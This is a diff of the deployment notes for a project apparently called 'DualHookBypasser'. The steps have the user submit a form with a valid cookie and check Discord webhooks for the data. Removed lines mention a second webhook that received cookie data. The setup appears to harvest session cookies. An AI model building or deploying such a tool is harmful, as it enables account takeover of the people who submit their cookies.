DualHookBypasser/BYpas22/DEPLOYMENT.md

 1. Visit your deployed site
 2. Submit a test form with a valid cookie
-3. Check Discord - you should receive both:
+3. Check Discord - you should receive the webhook message with your data
-   - Main webhook (with cookie data)
-   - Bypass logs webhook (clean data)

 ## Verifying Environment Variables